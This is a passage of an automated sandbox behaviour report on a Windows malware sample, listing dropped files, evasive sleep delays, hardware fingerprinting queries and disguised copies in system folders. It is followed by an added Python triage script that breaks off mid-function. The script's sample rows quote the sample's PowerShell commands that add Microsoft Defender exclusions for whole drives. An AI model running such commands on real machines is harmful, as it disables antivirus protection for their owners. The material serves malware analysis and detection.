                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\kuPmEXym.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\fSOKaeua.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\uuKznmFw.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\XmhcMluo.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\MgnHXjFm.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\jybLobci.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\QNGyvuni.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\IrkyWqxk.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\pHCSiMBb.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\FQiXIcGc.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe TID: 1456 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 | Thread sleep count: 1301 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 | Thread sleep count: 1315 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep count: 1299 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep count: 1984 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 | Thread sleep count: 1834 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 | Thread sleep count: 1780 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 | Thread sleep count: 1182 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 | Thread sleep count: 1355 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8380 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 | Thread sleep count: 1477 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 | Thread sleep count: 1223 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 | Thread sleep count: 1299 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 | Thread sleep count: 1254 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8396 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\conhost.exe TID: 9192 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe TID: 9180 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 9108 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exe TID: 9196 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe TID: 8344 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 8532 | Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -600000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -599796s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6696 | Thread sleep time: -7200000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -598718s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -597828s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -597375s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -596468s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -595281s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -594790s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -594576s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -593531s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -591343s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -590953s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -589509s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -588812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -588461s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -588136s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -587593s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -587350s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -587166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -586900s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -586468s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -586174s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6696 | Thread sleep time: -300000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -585871s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -584340s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -584166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -583975s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -583656s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -583425s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -583305s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -582187s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -581949s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -581629s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -581455s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -581232s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -580961s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -580801s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -580604s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -580095s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -579637s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -579159s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -578796s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -578578s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -578328s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -577135s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -576812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -576343s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -575968s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -575489s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -573886s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -572540s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -572203s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -571968s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -571754s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -571562s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -571234s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -571039s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716 | Thread sleep time: -570920s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 1024 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 768 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep count: 937 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 740 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep count: 1032 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep count: 814 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep count: 840 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 867 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 982 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 842 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep count: 783 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6808Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                          Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (25 identical rows in the report)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (25 identical rows in the report)
                          Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Last function: Thread delayed
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\conhost.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (24 identical rows in the report)
                          Source: C:\Recovery\conhost.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time (61 rows, in report order): 30000, 922337203685477, 600000, 599796, 3600000, 598718, 597828, 597375, 596468, 595281, 594790, 594576, 593531, 591343, 590953, 589509, 588812, 588461, 588136, 587593, 587350, 587166, 586900, 586468, 586174, 300000, 585871, 584340, 584166, 583975, 583656, 583425, 583305, 582187, 581949, 581629, 581455, 581232, 580961, 580801, 580604, 580095, 579637, 579159, 578796, 578578, 578328, 577135, 576812, 576343, 575968, 575489, 573886, 572540, 572203, 571968, 571754, 571562, 571234, 571039, 570920
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (12 identical rows in the report)
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File opened: C:\Users\user\AppData\Local
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1897117600.000000001B600000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1897117600.000000001B600000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (12 identical rows in the report)
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | Process token adjusted: Debug
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Process token adjusted: Debug
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Process token adjusted: Debug
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (12 identical rows in the report)
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Memory allocated: page read and write | page guard
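                          The rows above (thread delays, hardware WMI queries, system binary names such as conhost.exe running from C:\Recovery and the Chrome directory) and the Add-MpPreference rows in the evasion section that follows are exactly the patterns an analyst triages by hand. As an added example, not part of the Joe Sandbox report and not the sample's own code, the Python below parses behaviour rows written in a one-line "Source: <process> | <behaviour>: <detail>" form (the report renders them as two columns) and flags four things: Defender exclusions covering a drive root or a top-level folder; delays of five minutes or more, singling out 922337203685477, which is Int64.MaxValue ticks of 100 ns expressed in milliseconds, that is .NET TimeSpan.MaxValue; one process querying three or more hardware-identifying WMI classes; and a system binary name running from outside System32 or SysWOW64. The sample rows are transcribed from this report; reading the delay values as milliseconds (600000 = 10 min, 3600000 = 1 h), the five-minute threshold, the WMI class list and the system-binary list are the example's own assumptions.

```python
"""Triage of Joe Sandbox style behaviour rows (added example, not report content)."""
import re
from collections import defaultdict

# Constructed sample: rows transcribed from this report into a single-line
# "Source: <process> | <behaviour>: <detail>" form (the report renders two columns).
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Thread delayed: delay time: 30000
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Recovery\conhost.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Google\Chrome\Application\conhost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
"""

ROW_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<kind>[^:]+):\s*(?P<detail>.*)$")
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.IGNORECASE)
DELAY_RE = re.compile(r"delay time:\s*(\d+)")
WMI_CLASS_RE = re.compile(r"\bFROM\s+(Win32_\w+)", re.IGNORECASE)

# Int64.MaxValue ticks (100 ns) in milliseconds: .NET TimeSpan.MaxValue, "wait as long as possible".
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000           # 922337203685477
LONG_DELAY_MS = 5 * 60 * 1000                     # assumed threshold; delay values taken as ms
# Assumed: WMI classes commonly read to fingerprint hardware or spot a VM.
FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_BIOS", "Win32_ComputerSystem",
                       "Win32_Processor", "Win32_VideoController", "Win32_PnPEntity"}
# Assumed: binaries that legitimately live only under these directories.
SYSTEM_BINARIES = {"conhost.exe", "svchost.exe", "schtasks.exe", "powershell.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_rows(text):
    """Return (source, behaviour kind, detail) tuples; lines that do not parse are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m["source"], m["kind"], m["detail"]))
    return rows


def broad_exclusions(rows):
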